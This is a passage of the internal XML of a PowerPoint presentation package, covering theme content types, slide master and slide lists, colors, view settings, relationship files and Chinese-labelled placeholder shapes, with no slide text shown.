  <Override PartName="/ppt/theme/theme41.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme42.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme43.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme44.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme45.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme46.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme47.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme48.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme49.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme5.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme50.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme51.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme52.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme53.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme54.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme55.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme56.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme57.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme58.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme59.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme6.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme60.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme61.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme62.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme63.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme64.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme65.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme66.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme7.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme8.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme9.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p:sldMasterIdLst>
    <p:sldMasterId id="2147483648" r:id="rId1"/>
    <p:sldMasterId id="2147483650" r:id="rId3"/>
    <p:sldMasterId id="2147483652" r:id="rId4"/>
    <p:sldMasterId id="2147483654" r:id="rId5"/>
    <p:sldMasterId id="2147483657" r:id="rId6"/>
    <p:sldMasterId id="2147483659" r:id="rId7"/>
    <p:sldMasterId id="2147483661" r:id="rId8"/>
    <p:sldMasterId id="2147483663" r:id="rId9"/>
    <p:sldMasterId id="2147483665" r:id="rId10"/>
    <p:sldMasterId id="2147483667" r:id="rId11"/>
    <p:sldMasterId id="2147483669" r:id="rId12"/>
    <p:sldMasterId id="2147483671" r:id="rId13"/>
    <p:sldMasterId id="2147483673" r:id="rId14"/>
    <p:sldMasterId id="2147483675" r:id="rId15"/>
    <p:sldMasterId id="2147483677" r:id="rId16"/>
    <p:sldMasterId id="2147483679" r:id="rId17"/>
    <p:sldMasterId id="2147483681" r:id="rId18"/>
    <p:sldMasterId id="2147483683" r:id="rId19"/>
    <p:sldMasterId id="2147483685" r:id="rId20"/>
    <p:sldMasterId id="2147483687" r:id="rId21"/>
    <p:sldMasterId id="2147483689" r:id="rId22"/>
    <p:sldMasterId id="2147483691" r:id="rId23"/>
    <p:sldMasterId id="2147483693" r:id="rId24"/>
    <p:sldMasterId id="2147483695" r:id="rId25"/>
    <p:sldMasterId id="2147483697" r:id="rId26"/>
    <p:sldMasterId id="2147483699" r:id="rId27"/>
    <p:sldMasterId id="2147483701" r:id="rId28"/>
    <p:sldMasterId id="2147483703" r:id="rId29"/>
    <p:sldMasterId id="2147483705" r:id="rId30"/>
    <p:sldMasterId id="2147483707" r:id="rId31"/>
    <p:sldMasterId id="2147483709" r:id="rId32"/>
    <p:sldMasterId id="2147483711" r:id="rId33"/>
    <p:sldMasterId id="2147483713" r:id="rId34"/>
    <p:sldMasterId id="2147483715" r:id="rId35"/>
    <p:sldMasterId id="2147483717" r:id="rId36"/>
    <p:sldMasterId id="2147483719" r:id="rId37"/>
    <p:sldMasterId id="2147483721" r:id="rId38"/>
    <p:sldMasterId id="2147483723" r:id="rId39"/>
    <p:sldMasterId id="2147483725" r:id="rId40"/>
    <p:sldMasterId id="2147483727" r:id="rId41"/>
    <p:sldMasterId id="2147483729" r:id="rId42"/>
    <p:sldMasterId id="2147483731" r:id="rId43"/>
    <p:sldMasterId id="2147483733" r:id="rId44"/>
    <p:sldMasterId id="2147483735" r:id="rId45"/>
    <p:sldMasterId id="2147483737" r:id="rId46"/>
    <p:sldMasterId id="2147483739" r:id="rId47"/>
    <p:sldMasterId id="2147483741" r:id="rId48"/>
    <p:sldMasterId id="2147483743" r:id="rId49"/>
    <p:sldMasterId id="2147483745" r:id="rId50"/>
    <p:sldMasterId id="2147483747" r:id="rId51"/>
    <p:sldMasterId id="2147483749" r:id="rId52"/>
    <p:sldMasterId id="2147483751" r:id="rId53"/>
    <p:sldMasterId id="2147483753" r:id="rId54"/>
    <p:sldMasterId id="2147483755" r:id="rId55"/>
    <p:sldMasterId id="2147483757" r:id="rId56"/>
    <p:sldMasterId id="2147483759" r:id="rId57"/>
    <p:sldMasterId id="2147483761" r:id="rId58"/>
    <p:sldMasterId id="2147483763" r:id="rId59"/>
    <p:sldMasterId id="2147483765" r:id="rId60"/>
    <p:sldMasterId id="2147483767" r:id="rId61"/>
    <p:sldMasterId id="2147483769" r:id="rId62"/>
    <p:sldMasterId id="2147483771" r:id="rId63"/>
    <p:sldMasterId id="2147483773" r:id="rId64"/>
    <p:sldMasterId id="2147483775" r:id="rId65"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId68"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId101"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId66"/>
    <p:sldId id="263" r:id="rId67"/>
    <p:sldId id="665" r:id="rId69"/>
    <p:sldId id="642" r:id="rId70"/>
    <p:sldId id="643" r:id="rId71"/>
    <p:sldId id="644" r:id="rId72"/>
    <p:sldId id="729" r:id="rId73"/>
    <p:sldId id="767" r:id="rId74"/>
    <p:sldId id="768" r:id="rId75"/>
    <p:sldId id="769" r:id="rId76"/>
    <p:sldId id="770" r:id="rId77"/>
    <p:sldId id="771" r:id="rId78"/>
    <p:sldId id="772" r:id="rId79"/>
    <p:sldId id="773" r:id="rId80"/>
    <p:sldId id="774" r:id="rId81"/>
    <p:sldId id="775" r:id="rId82"/>
    <p:sldId id="776" r:id="rId83"/>
    <p:sldId id="777" r:id="rId84"/>
    <p:sldId id="779" r:id="rId85"/>
    <p:sldId id="780" r:id="rId86"/>
    <p:sldId id="781" r:id="rId87"/>
    <p:sldId id="782" r:id="rId88"/>
    <p:sldId id="783" r:id="rId89"/>
    <p:sldId id="784" r:id="rId90"/>
    <p:sldId id="785" r:id="rId91"/>
    <p:sldId id="787" r:id="rId92"/>
    <p:sldId id="795" r:id="rId93"/>
    <p:sldId id="788" r:id="rId94"/>
    <p:sldId id="789" r:id="rId95"/>
    <p:sldId id="666" r:id="rId96"/>
    <p:sldId id="691" r:id="rId97"/>
    <p:sldId id="690" r:id="rId98"/>
    <p:sldId id="692" r:id="rId99"/>
    <p:sldId id="637" r:id="rId100"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId105"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId106"/>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7A7AF"/>
    <a:srgbClr val="D1202F"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="FADBD8"/>
    <a:srgbClr val="37BECC"/>
    <a:srgbClr val="D7F2F5"/>
    <a:srgbClr val="E74C3C"/>
    <a:srgbClr val="CA3E9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showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="71" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="412" y="44"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3894"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:gridSpacing cx="72000" cy="72000"/>
</p:viewPr>
</file>

<file path=ppt/_rels/presentation.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide33.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster8.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster7.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster64.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster63.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster62.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster61.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster60.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster59.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster58.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster57.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster56.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster55.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster54.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster53.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster52.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster51.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster50.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster49.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster48.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster47.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster46.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster45.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster44.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster43.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster42.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster41.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster40.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster39.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster3.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster38.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster37.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster36.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster35.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster34.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster33.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster32.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster31.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster30.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster29.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster2.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster28.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster27.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster26.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster25.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster24.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster23.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster22.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster21.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster20.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster19.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster18.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster17.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster16.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster15.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster14.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster13.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster12.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster11.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster10.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag475.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide34.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster9.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66.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696C064A-D61B-4B21-B757-51A9B82445B8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0305E07-67EA-4042-A3F6-853A8AD8D209}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr 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521922-B392-49CB-98B2-D1506FCEECF3}"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6B082BF-40C1-4E6C-9085-1B48E30F0BDA}"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923020B4-C4F0-47FB-9EF6-DA1D8CA35CE4}"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endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符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defRPr/>
            </a:pPr>
            <a:fld id="{FE284FBA-1E51-41CA-94CE-3C4A9B97CA20}" type="slidenum">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:ea typeface="等线" panose="02010600030101010101" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="0"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4.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6.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7.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9.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0.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7.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8.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9.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0.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36.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3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3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39.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0.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3.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6.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7.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48.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4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0.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4.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55.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56.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57.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58.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5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60.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61.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62.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6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64.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838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{82F288E0-7875-42C4-84C8-98DBBD3BF4D2}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="页脚占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="6356350"/>
            <a:ext cx="4114800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7D9BB5D0-35E4-459D-AEF3-FE4D7C45CC19}"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tags" Target="../tags/tag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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag54.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag53.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag50.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag49.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme10.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag60.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag59.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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theme" Target="../theme/theme11.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
